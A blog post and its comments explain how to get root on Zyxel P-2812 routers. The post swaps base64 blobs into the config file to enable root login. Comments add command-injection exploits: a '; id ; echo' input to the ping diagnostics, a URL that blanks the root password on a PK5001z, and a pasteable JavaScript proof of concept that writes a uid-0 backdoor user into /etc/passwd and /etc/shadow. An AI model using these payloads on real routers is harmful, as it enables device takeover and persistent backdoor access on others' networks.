How to get root on Zyxel P-2812

This was done on firmware 3.10 BLN.11(probably works on all the other firmwares also)
Download it here first if you dont have it.

1. Backup your config file

2. Open the config.rom in Notepad++
3. Search for Shadow
4. Replace the entire string that begins with H4S(might be different)
5. Replace it with:

H4sIAHVmwlAAA+2VXW/aMBSGud6voBJXk1piksDIHUNbVlZRVGm7N7FJosYfxDaB/vo5qNok5NNd
oWnqebgI4uHY5/AmhttiPLgykWeWpuer5/J6fk8m0TRKphP/GkQkiuN4MEyv3ViPM5a2w+GgVcq+
9b2/+f8U7vM3FWWqu94efcDTJIHyjwlJfuefzIjPn6RJNBhG12vpD+88/36sbERGo3p5x36YXB/X
61XOHwVhX2s1zkgckTiLsnlPNsuy7MPa0CduCscXsuTNuXhDlt+SdvUQb8R8cf85tW5C8jtfnMwv
ire1zD6GVmWUCwU4ykRYNDr8uTnJAjCVs/5mBzaqaGPDRtC6CRvJOxM2zhVAf0rzllrVhm1JBQeW
LJWuOFC2s8BuUm0VO4Vdq0V2cxMyh8JQQElTMEAZU0Gq1QVsnPFjAbvtzOsEYd9HI13TQB0JYTTg
dEEhRTUtKg6tuXc1NGbHt7SpX8BxjjsDDepzh1aVFmq0ZFCCVFDJoAwLKiXkOikBs6NHqEFumRNQ
k9JZwDQMjECczB5KtWZcQktqZeyuhhrtbxf/w7xRW7Yciki39UEdoTtRH6AoGDfPVkGDtpQdoOD9
2eePzP6QVcsH9+VneU/qxf5x8Ul3zy+LkgT7oMZ0qmXnsv3T5vtMTOJ85QwVuVb5w/Y0ztIoSS4f
htvScQMcgFQqeRLKmVvwnPnX/2UIgiAIgiAIgiAIgiAIgiAIgiAIgiDvmV8MZ8UDACgAAA==

6. Change <Size PARAMETER="configured" TYPE="uint16" MAX="4095" MIN="0">380</Size>
 to
 <Size PARAMETER="configured" TYPE="uint16" MAX="4095" MIN="0">774</Size>

7. Go down a couple of lines to Passwd field.
8. Replace the entire string that begins with H4S(might be different)
9. Replace it with:

H4sIAOtnwlAAA+3SUY6DIBQFUL67CnfAo0Wb9q9bmHQDNNJogjwjzIyz+6FiEzMx06+maXIPCph3
CRjtTQjftXgqSiqtpzH5O5Le7oXaUkW62pW6FKQUKRIFPfdY2WeIZigKMTDH/3KP6m/q9lrH8Uip
TVOZ+0vrZWg2rk+1fWppIr/MIEPP7KTr6xy5GhfsxvOF65+UPBxu1/woPXs7tiFaH5fps3XW8/Bh
O472VHetn/dfKciGOyvXCvMBzby+JDXdZrFskcw73zdT6Z/L3Wk9HppXfxYAAAAAAAAAAAAAAAAA
AAAAAICHfgEQuB8vACgAAA==

10. Change
<Size PARAMETER="configured" TYPE="uint16" MAX="4095" MIN="0">338</Size>
to
<Size PARAMETER="configured" TYPE="uint16" MAX="4095" MIN="0">336</Size>

11. Save file

12. Upload config.rom file in backup/restore in webgui of router.

13. Router will now restart

13. You can now connect to router as root :-) (telnet23/ssh22022/scp22022)
       Use Login: root Password: 1234

If you reset the router, it will revert back to old values, and you have to do the above procedure again.

Useful software:
WinSCP
PuTTY
Notepad++

20 comments:

  1. Hi, i have this model: Zyxel P-2812HNU-F1

    What's the difference?

    Can i root same method?

    ReplyDelete
  2. If the files are similar then you probably can use the same method since the only difference on F1 and F3 is that F1 is Annex.A and F3 is Annex.B

    ReplyDelete
  3. This comment has been removed by a blog administrator.

    ReplyDelete
  4. No, files aren't similar. My firmware is special by ISP.

    ReplyDelete
  5. Thanks! Method works fine with V3.10(BLN.12).

    I took a look at their web interface implementation. WOW. Like in old good 90s:
    # strings /usr/share/web/ping.cgi | grep 'ping '
    ping %s -c 4 2>&1

    And guess what - httpd is running under root.
    So in Maintenance -> Diagnostics , instead of server name type:
    ; id ; echo

    And it outputs:
    uid=0(root) gid=0(root)

    I think we can get root with just a couple of pings :)

    ReplyDelete
    Replies
    1. This comment has been removed by the author.

      Delete
    2. I don't have the same router, I have a ZyXEL PK5001z, but they are pretty similar. However, the PK5001z firmware at least is SHIT! (Tons of zombie sh processes...)

      Anyways, haxx: http://192.168.0.1/pingtrace.cgi?pingSize=32&pingAddr=%60passwd%20-d%20root%60

      Delete
    3. Forgot. I don't know if this will work on the P-2812 (I think it might not - you might need to change the cgi filename and the parameters), but at least on the PK5001z, you can just log in to the web interface and copy/paste that to the address bar.

      Delete
    4. Sorry about the double comment, and the last comment was supposed to start "I forgot to say that I don't..."

      Delete
    5. This comment has been removed by the author.

      Delete
  6. Here's a POC javascript:
    Using Chrome, open web UI and log in as normal user. In Chrome go to View -> Developer -> Open JavaScript console.

    Copy and paste the following:

    lol_cmds=[";echo '#!/bin/sh' >/tmp/b ;",
    ";echo -n echo lol >>/tmp/b ;",
    ";echo -n :x:0:0:OM >>/tmp/b ;",
    ";echo -n G,,,:/roo >>/tmp/b ;",
    ";echo -n t:/bin/s >>/tmp/b ;",
    ";echo -n 'h >>' >>/tmp/b ;",
    ";echo /etc/passwd >>/tmp/b ;",
    ";echo -n \"echo '\" >>/tmp/b ;",
    ";echo -n lol >>/tmp/b ;",
    ";echo -n ':$1$tKy' >>/tmp/b ;",
    ";echo -n 'phRcV$V' >>/tmp/b ;",
    ";echo -n wSPjoXUh8 >>/tmp/b ;",
    ";echo -n UEb60IOuV >>/tmp/b ;",
    ";echo -n OS0:13013 >>/tmp/b ;",
    ";echo -n :0:99999: >>/tmp/b ;",
    ";echo -n \"7:::' \" >>/tmp/b ;",
    ";echo -n '>>' >>/tmp/b ;",
    ";echo -n /etc/shad >>/tmp/b ;",
    ";echo ow >>/tmp/b ;",
    ";chmod +x /tmp/b ;",
    "; /tmp/b ;"]
    lol_i = 0;
    function lol() {
    if (lol_i < lol_cmds.length) {
    $.post("../../../ping.cgi", {ping:1,IPaddress:lol_cmds[lol_i++]});
    window.setTimeout(lol, 1500);
    } else {
    alert('All done!');
    }
    }
    alert('Hit Enter and wait for "All done!" alert\r\nUser: lol, password: omg');
    lol();


    And press Enter.
    You can now telnet/ssh login with user lol and password omg.

    ReplyDelete
    Replies
    1. LOL2812,

      your POC script working on my p2812 but how can i get root on my modem. My firmware: V3.10(TUI.7)ex

      config method not work on me.

      which command working on this modem?
      or how can i flash universal firmware via tftp or telnet?

      thank you

      Delete
  7. look here few steps, i hope someone can manage better than me.

    https://forum.openwrt.org/viewtopic.php?id=46616

    ReplyDelete
  8. Hva er fordelene med å roote routern? Jeg har vært plaget med utrolig ustabilt nett den siste uken. Nettet faller ut så ofte som annenhvert minutt. Telenor har feilsøket linjen men finner ingenting så jeg tror modemet er syndern.

    ReplyDelete
  9. Hi, somebody could help me to get root or replace firmware on my P-2812HNU-F1 from Telfort (with a customized firmware)
    Thanks!

    ReplyDelete
  10. https://forum.openwrt.org/viewtopic.php?pid=215706
    getting control of ones router with a script that is called if exists by original fw

    ReplyDelete
  11. I'm curious how the password is generated, could you provide me some info or links to the used algorithm? Thanks!

    ReplyDelete
  12. Thanks for this post. Worked perfect and on later firmware.

    ReplyDelete
  13. https://gist.github.com/oxagast/32b058397e95ba762ac30e8520218417 GitHub gist of the remote root exploit for the pk5001z CenturyLink branded router.

    ReplyDelete